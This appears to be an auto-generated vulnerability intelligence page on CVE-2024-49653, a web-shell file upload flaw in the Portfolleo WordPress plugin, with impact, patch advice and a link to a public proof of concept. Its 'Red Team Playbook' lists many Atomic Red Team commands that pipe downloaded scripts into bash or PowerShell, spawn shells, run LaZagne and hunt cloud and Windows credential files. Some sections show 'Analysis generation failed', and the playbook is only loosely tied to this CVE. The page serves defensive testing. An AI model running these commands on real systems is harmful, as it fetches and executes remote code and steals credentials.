CVE-2024-49653
Overview
The vulnerability is an unrestricted file upload flaw classified under CWE-434. It arises from insufficient validation of file types during the upload process in the james-eggers Portfolleo plugin. The affected component is the file upload functionality, which fails to restrict or sanitize dangerous file types, allowing potentially malicious files to be uploaded to the web server.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in james-eggers Portfolleo portfolleo allows Upload a Web Shell to a Web Server.This issue affects Portfolleo: from n/a through <= 1.2.
Impact
An attacker with a low-privileged authenticated account can upload a web shell to the server, resulting in full remote code execution capabilities. This access enables complete compromise of the web server, including data theft, modification, or destruction, and potential lateral movement within the network. No user interaction beyond authentication is necessary, increasing the ease of exploitation and the severity of business impact such as data breaches and service disruption.
Solution
Users of the james-eggers Portfolleo plugin should upgrade to a version later than 1.2 where this vulnerability is addressed. Detailed patch instructions and version updates are available at the Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/portfolleo/vulnerability/wordpress-portfolleo-plugin-1-2-arbitrary-file-upload-vulnerability?_s_id=cve. Applying the vendor-provided update will restrict file upload types and mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with unrestricted file uploads in the Portfolleo application presents a significant security risk, particularly due to its ability to allow the upload of web shells. This flaw arises from inadequate validation of file types during the upload process, enabling malicious actors to bypass security measures and execute arbitrary code on the server. The affected versions of Portfolleo, specifically those up to and including version 1.2, lack the necessary controls to restrict file uploads to safe formats, making it easy for attackers to introduce harmful scripts disguised as legitimate files.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious file, such as a PHP or ASP script, and upload it to the server, leveraging the unrestricted file upload feature. Once the web shell is successfully uploaded, the attacker gains remote access to the server, allowing them to execute commands, manipulate files, and potentially pivot to other systems within the network. This exploitation can be initiated through social engineering tactics, phishing campaigns, or by directly targeting vulnerable installations of the application. The ease of execution and the low technical barrier for attackers make this vulnerability particularly concerning.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on Portfolleo for managing their web presence. Successful exploitation can lead to data breaches, unauthorized access to sensitive information, and significant disruptions to business operations. The financial implications can be severe, ranging from direct costs associated with remediation efforts to indirect costs such as reputational damage, loss of customer trust, and potential legal liabilities. Furthermore, the high CVSS score of 9.9 indicates that this vulnerability poses a critical risk, necessitating immediate attention from affected organizations.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. First, it is essential to conduct a thorough assessment of the current deployment of Portfolleo, identifying any instances of the application that may be vulnerable. Regular security audits and vulnerability scans can help in identifying potential weaknesses. Additionally, organizations should enforce strict file upload policies, ensuring that only specific file types are permitted and that all uploaded files are subjected to rigorous validation and sanitization processes. Employing web application firewalls (WAFs) can also provide an additional layer of protection by monitoring and filtering incoming traffic for malicious payloads.
In conclusion, the unrestricted file upload vulnerability in Portfolleo poses a significant threat to organizations utilizing this application. The potential for remote code execution through web shells highlights the urgent need for effective security measures. By understanding the technical details of the vulnerability, recognizing potential attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical security flaw. Proactive measures and a commitment to ongoing security practices are essential in safeguarding against such vulnerabilities in the ever-evolving landscape of cybersecurity threats.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-49653, marked by the emergence of publicly available proof-of-concept exploit code hosted on GitHub. This new availability has coincided with the assignment of a critical CVSS score of 9.9 and a substantial EPSS score nearing the 0.59 threshold, indicating a heightened likelihood of active exploitation attempts. Our telemetry reflects a marked escalation in exploit activity, underscoring that threat actors are now equipped with accessible tools to deploy web shells via the Portfolleo plugin vulnerability. This shift elevates the threat level from theoretical to practical, increasing the urgency for defenders to recognize the potential for remote code execution and unauthorized server control. The presence of a stable yet high EPSS score suggests sustained interest and exploitation potential rather than a transient spike, signaling that this vulnerability is becoming a favored vector for attackers. Consequently, the risk assessment for affected environments must be adjusted to reflect a critical and immediate threat, as the barrier to exploitation has been significantly lowered by the public disclosure of exploit code.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Nxploited/CVE-2024-49653
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability
|
Nxploited | 0 | 0 | 2025-03-22 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-49653 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/portfolleo/vulnerability/wordpress-portfolleo-plugin-1-2-arbitrary-file-upload-vulnerability?_s_id=cve |